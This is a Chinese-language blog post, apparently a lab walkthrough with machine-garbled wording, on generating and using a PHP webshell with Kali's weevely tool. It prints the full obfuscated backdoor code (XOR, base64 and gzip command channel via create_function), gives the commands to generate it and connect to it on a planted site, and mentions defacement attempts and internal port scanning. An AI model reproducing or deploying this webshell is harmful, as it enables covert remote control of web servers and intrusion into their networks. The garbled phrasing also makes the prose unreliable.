圈子里一样平常把网站的webshell叫做菜刀,后来海内有人接管了开源菜刀的精髓,写出了「中国菜刀」和「蚁剑」,深受圈子里的喜好~

如果是asp网站就叫asp菜刀如果是php网站就叫php菜刀如果是jsp网站就叫jsp菜刀

上一篇文章(Nishang下的Webshell实验)中先容的antak是著名的asp菜刀,本篇先容的是weevely是php菜刀,weevely是kali自带的菜刀工具,利用非常大略~

通过weevely天生php网站的webshell密码是ailx10webshell文件是ailx10.php

weevely generate ailx10 ./ailx10.php

jsp菜刀php菜刀weevely的简略试验 NoSQL

杀毒软件记住它的样子逮到就打~

<?php$L=&#39;_ReRnd_cleanR();$r=@base6R4_encRoRde(@xR(@gzcompRrRess($o),$k));priRnt("RR$p$kh$r$kf");}';$N='$k="83RbR7050R4";$khRR="e0d8742ddR5b6";$kf="6e6R962eRbR8Ra35";$p="BBRvw7vZKnRvzgivDm";Rf';$E='unctioRRn x($t,$k){$Rc=strlRen($k)R;$l=sRtrlenR($t);$o=R"";fRor($i=0;$iR<$Rl;){for(R$j';$p='R=0;($j<$c&&$Ri<$lR);R$j++R,$i++){$o.=$t{RR$i}^$k{$j}R;}}returnR R$o;}Rif(@preg_match';$v='val(@gzuncRoRmpress(@x(@baRseR64_decodeR($Rm[1]),R$k)))R;$o=@oRb_getR_contents(R);@ob';$V=str_replace('x','','xcxreate_xfuxnxctixon');$a='R("/$kRhR(.+)R$kf/",@fiRle_get_RcontentRs("phRRp://input"),R$m)==1){RR@obR_start();@eR';$z=str_replace('R','',$N.$E.$p.$a.$v.$L);$u=$V('',$z);$u();?>将菜刀文件ailx10.php 放到php网站的根目录中访问网站首页统统正常

输入指定获取webshell,便是辣么大略~weevely http://192.168.160.140/ailx10.php ailx10

本来还想着挂一个黑夜(页)走人结果权限不足,丢人了~只有读权限,只能看,不能摸怎么行?

实行内网端口扫描

查看系统信息

本篇完~